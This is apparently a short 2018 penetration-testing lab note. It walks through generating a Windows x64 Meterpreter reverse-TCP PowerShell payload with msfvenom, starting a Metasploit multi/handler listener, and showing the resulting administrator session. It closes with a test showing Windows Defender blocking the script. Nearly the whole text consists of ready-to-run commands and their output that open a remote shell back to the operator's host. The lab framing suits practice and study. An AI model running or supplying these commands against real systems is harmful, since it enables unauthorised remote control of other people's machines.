1. Create shell
root@kali:~/htb# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.16 LPORT=443 -f psh -o meterpreter-64.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh file: 3255 bytes
Saved as: meterpreter-64.ps1
2. Set up listener
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.178.16; set lport 443; set ExitOnSession false; exploit -j"
3. Interact
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.17.25-dev                         ]
+ -- --=[ 1828 exploits - 1033 auxiliary - 318 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.178.16
lport => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.178.16:443
msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 192.168.178.10
[*] Meterpreter session 1 opened (192.168.178.16:443 -> 192.168.178.10:53418) at 2018-11-21 14:27:09 -0500

msf exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x64/windows  HTB\administrator @ PUCKIE  192.168.178.16:443 -> 192.168.178.10:53418 (192.168.178.10)
4. If Windows Defender is enabled
PS C:\PENTEST> C:\PENTEST\meterpreter-64.ps1
At C:\PENTEST\meterpreter-64.ps1:1 char:1
+ $VlSIhDyrsor = @"
+ ~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\PENTEST>
5. Summary
The generated .ps1 can be saved to disk without being detected as a virus, and it runs successfully and creates a shell, but it cannot run with Defender enabled on my Windows 10 box.
(c)2018 Jacco Straathof